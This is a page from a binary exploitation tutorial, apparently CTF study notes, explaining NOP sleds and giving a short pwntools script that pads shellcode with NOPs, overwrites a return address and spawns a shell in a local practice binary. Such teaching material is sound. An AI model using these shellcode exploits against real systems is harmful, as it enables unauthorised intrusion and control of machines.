Binary Exploitation
HackTheBoxCTF WriteupsCryptography
Search…
Binary Exploitation Notes
Types
Stack
Introduction
ret2win
De Bruijn Sequences
Shellcode
NOPs
32- vs 64-bit
No eXecute
Return-Oriented Programming
Format String Bug
Stack Canaries
PIE
ASLR
GOT Overwrite
RELRO
Reliable Shellcode
One Gadgets and Malloc Hook
Syscalls
ret2dlresolve
ret2csu
Exploiting over Sockets
Forking Processes
Stack Pivoting
Heap
Kernel
Other
pwntools
Powered By GitBook
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. Which makes then very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backwards won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90.
The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing. You can read a bit more about it on this StackOverflow question.

Updating our Shellcode Exploit

We can make slight changes to our exploit to do two things:
  • Add a large number of NOPs on the left
  • Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location my be different.
1
from pwn import *
2
​
3
context.binary = ELF('./vuln')
4
​
5
p = process()
6
​
7
payload = b'\x90' * 240 # The NOPs
8
payload += asm(shellcraft.sh()) # The shellcode
9
payload = payload.ljust(312, b'A') # Padding
10
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
11
​
12
log.info(p.clean())
13
​
14
p.sendline(payload)
15
​
16
p.interactive()
Copied!
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:
1
nop = asm(shellcraft.nop())
Copied!
Previous
Shellcode
Next
32- vs 64-bit
Last modified 1yr ago
Export as PDF
Copy link
Contents
Updating our Shellcode Exploit